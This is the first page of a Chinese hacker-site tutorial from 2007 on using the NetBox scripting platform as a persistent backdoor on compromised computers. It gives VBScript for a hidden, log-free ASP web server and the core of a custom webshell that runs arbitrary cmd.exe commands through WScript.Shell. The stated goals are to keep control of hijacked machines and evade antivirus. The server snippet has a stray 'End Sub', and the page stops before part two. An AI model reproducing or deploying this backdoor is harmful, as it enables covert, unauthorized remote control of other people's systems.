黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]网络盒子netbox让菜鸟轻松拥有自己的超级http后门
      ★★★★

网络盒子netbox让菜鸟轻松拥有自己的超级http后门

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-1-13 10:12:07
一:前言
在当今微软当道的年代,找肉鸡已经不是什么难事,各种各样的傻瓜工具大大方便了菜鸟们的入侵,但是往往入侵成功了,怎么去做好后门,把肉鸡尽可能久的抓住往往困惑着像我一样的菜鸟们。用过无数网上经典的后门后,在丢失了n多辛辛苦苦弄到的肉鸡后,我下定决心要写自己的后门。于是有了下面的文章。

二:netbox简介
一个偶然的机会,我认识了netbox。netbox是北京综艺达公司出品的一个使用脚本语言进行应用软件开发与发布的开发环境和运行平台,使用 NetBox,可以完全使用脚本语言(比如 VBScript,javascript) 创建出稳定高效的应用软件,并且可以平滑移植到从 Windows 98 到 Windows .NET Server 的全部操作系统上。
它可以方便的将asp应用编译成为独立运行的执行程序,完全摆脱iis的束缚(将iis卸载后程序运行仍然正常),在几乎所有的Windows版本上面直接运行,完全不需要考虑平台兼容性和对asp运行环境的要求。同时NetBox还提供大量扩展部件,使得WEB应用更加方便。说了那么多,大家肯定很想见识见识这位帅哥吧,好。

三:一起动手
如果大家已经对脚本语言VBScript或者javascript有一点了解,那就可以跟我动手了。我们的任务是在建立一个与iis完全无关的web服务器,它可以为我们提供FSO的支持,以方便上传文件。并支持脚本宿主WSH,这样我们就能执行命令了。在网站根目录里我们可以放上自己的asp木马或其它的木马后门并可以随时执行。
首先需要建立我们的web服务器,这个服务器和IIS没有任何关系,即使卸载了IIS它也可以运行。利用NetBox的HttpServer对象就能轻易的办到。
在记事本里写入如下几行代码:
Set httpd = CreateObject("NetBox.HttpServer")
'创建httpserver对象
If httpd.Create("", 8000) = 0 Then
'web服务端口设为8000,可以自己改,不要和其他端口冲突就行了。
Set host = httpd.AddHost("", "\wwwroot")
'设置web服务的根目录为文件夹"wwwroot"。
host.EnableScript = true
'使Web服务器能够理解服务器端脚本程序,既支持asp。
host.AddDefault "default.asp"
host.AddDefault "default.htm"
host.AddDefault "index.asp"
host.AddDefault "index.htm"
host.AddDefault "default.html"
host.AddDefault "index.html"
'设置缺省文件,相当与iis中的默认文档。
httpd.Start
'开始服务
else
httpd.Stop
Shell.Quit 0
End If
End Sub
将文件存为main.box。
这样一个支持asp的服务器源代码就写成功了,它可以让你的asp木马随心所欲的运行,而且不用担心会有日志记录,但是现在它还远不是一个后门,只是提供了与IIS相当的功能,为了防止后门被杀,我们不妨自己来写一个简单的CMD.ASP,当然不是那个所谓的最简短的asp后门了。我们要实现的功能是可以上传文件和执行命令。
这里只分析主要的代码,详细的代码附在了软件包里。
set pyeWSH=server.createobject("WSCRIPT.SHELL")
'建立shell(wshshell)对象pyeWSH
set pyeFSO=server.createobject("scripting.filesystemobject")
'建立文件系统对象pyeFSO用于文件方面的操作
szTempFile="C:\"& pyeFSO.GetTempName()
'GetTempName()是fso建立临时文件的一种方法
Call pyeWSH.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)
'调用wshshell的run方法来执行命令,并把结果重定向到临时文件中
set oFile=pyeFSO.OpenTextFile(szTempFile,1,False,0)
'以读的方式打开临时文件

思路应该很清楚,我简单说说。

[1] [2] 下一页

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886